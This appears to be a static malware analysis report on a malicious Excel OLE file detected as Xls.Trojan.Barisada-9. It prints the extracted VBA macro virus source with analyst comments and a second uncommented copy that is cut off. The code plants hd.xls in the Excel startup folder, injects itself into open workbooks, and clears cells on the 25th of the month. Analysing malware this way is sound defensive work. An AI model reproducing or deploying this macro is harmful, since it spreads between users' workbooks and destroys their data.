Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca84fb9ed93c2451…

MALICIOUS

Office (OLE)

31.5 KB Created: 2000-12-20 08:21:33 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: fa679be3ec1161c85bb1a3d7c284b364 SHA-1: 62d00dbed3366de5255bd14e0d4a37d68539bc83 SHA-256: ca84fb9ed93c2451aa00175ab1612f0ff852e32f15d08a32ed1083ca670528fc
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

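The critical ClamAV detection and the medium-severity VBA-macro heuristic indicate malicious intent. The VBA script attempts to create a file named 'hd.xls' in the Excel startup path (Application.StartupPath). This summary originally described that file as likely a downloader for a second-stage payload. However, the portion of the extracted macro shown below contains no download or network calls. It instead copies its own code into every empty VBA component of every open workbook, including the newly created 'hd.xls', and saves that file in the startup folder. The visible behaviour is therefore better described as persistence and self-replication of a macro virus. The script also contains date-triggered logic: when the day of the month is 25 it displays a series of message boxes and, depending on the user's answers, clears worksheet cells. The summary reads this as suggesting a multi-stage attack, but the visible code shows only replication and a destructive trigger.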

Heuristics 2

  • ClamAV: Xls.Trojan.Barisada-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Barisada-9
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8882 bytes
SHA-256: 08ebe7689430e68e3f25fd28b3038653c73ab4b98a3c5abd133f2aef482bb0dc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)
' ANALYST NOTES (comments added during review; the code itself is unchanged).
' Workbook-level event handler named for the WindowDeactivate event, so it is
' expected to run when a workbook window loses focus rather than on open.
' Visible behaviour, in order:
'   1. Persistence: saves a new workbook as hd.xls in Application.StartupPath.
'   2. Replication: copies the "ThisWorkbook" module source into every VBA
'      component that has zero lines, in every open workbook.
'   3. Payload: on day 25 of any month, shows message boxes and may clear cells.
' No network, shell or download call appears in this routine.
' NOTE(review): steps 1-2 touch VBProject, which Excel normally blocks unless
' "Trust access to the VBA project object model" is enabled - confirm the
' setting on affected hosts when scoping impact.

Flag = False
 
' Persistence check: Dir() returns the bare file name when hd.xls already exists
' in the Excel startup folder. Detection point: an unexpected hd.xls there.
 myfile = Dir(Application.StartupPath & "\hd.xls")
 If myfile <> "hd.xls" Then
' Screen updating is switched off before the new workbook is created, which
' hides the creation from the user; it is not switched back on in this routine.
   Application.ScreenUpdating = False
' addtomru:=False keeps the new file out of the recently-used file list.
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 

' Replication loop over every open workbook (the freshly created hd.xls included).
For i = 1 To Workbooks.Count
' Read the full source of the workbook's "ThisWorkbook" module when it is not
' empty. vcode is not reset per workbook, so a value read from an earlier
' workbook carries over to later ones.
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
  
' Only components with zero lines are written to; components that already hold
' code are left untouched, so existing macros are not overwritten.
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
' If hd.xls was created in this run, close it with its changes saved, so the
' copy in the startup folder keeps whatever code was injected above.
 If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True
 


' Date trigger: the payload branch below runs only when the day of the month is 25.
dday = Day(Now)

If dday = 25 Then Flag = True

If Flag = True Then
' Two yes/no prompts. Answering "No" to both reaches the destructive branch;
' every other combination ends after a message box.
  v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _
  "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion")
  
  If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!"
  If v1 = vbNo Then
     MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer"
     v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.")
     If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer"
     If v2 = vbNo Then
       MsgBox "Wrong Answer, Your file will be deleted!", vbOKOnly + vbCritical, "You are SOB, too."
' Destructive payload: clears cell contents in open workbooks. Despite the
' message text, no file is deleted here. The sheet is indexed with i (the
' workbook counter), so the sheets affected depend on that index.
' Impact assessment: compare open workbooks against backups.
       For i = 1 To Workbooks.Count
        For j = 1 To Workbooks(i).Sheets.Count
          Workbooks(i).Sheets(i).Cells.Select
          Selection.Clear
       Next j: Next i:
     End If
     
     
  End If
 End If


End Sub














Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

Flag = False
 
 myfile = Dir(Application.StartupPath & "\hd.xls")
 If myfile <> "hd.xls" Then
   Application.ScreenUpdating = False
   Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\hd.xls", FileFormat:=xlNormal, addtomru:=False
 End If
 

For i = 1 To Workbooks.Count
  eline = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines
  If eline <> 0 Then vcode = Workbooks(i).VBProject.VBComponents.Item("thisworkbook").CodeModule.Lines(1, eline)
  
  
 For j = 1 To Workbooks(i).VBProject.VBComponents.Count
  vcount = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines
  If vcount = 0 Then Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.AddFromString (vcode)
 Next j: Next i
  
  
 If myfile <> "hd.xls" Then Workbooks("hd.xls").Close savechanges:=True
 


dday = Day(Now)

If dday = 25 Then Flag = True

If Flag = True Then
  v1 = MsgBox("Question : Hyundai Unicorns left from Incheon, What do you think of it? " & vbCr & _
  "Answer : Hyundai is SOB ", vbYesNo, "1st Qusetion")
  
  If v1 = vbYes Then MsgBox "Good! You're pretty good guy!!", vbOKOnly, "Excellent!"
  If v1 = vbNo Then
     MsgBox "Oh! no, Next question is last time for you", vbOKOnly + vbCritical, "Wrong Answer"
     v2 = MsgBox("We do not buy Hyundai's product, is it right?", vbYesNo, "If you have wrong answer, you will have punishment.")
     If v2 = vbYes Then MsgBox "You got it!", vbOKOnly, "You have right answer"
     If v2 = vbNo Then
       MsgBox "Wrong An
... (truncated)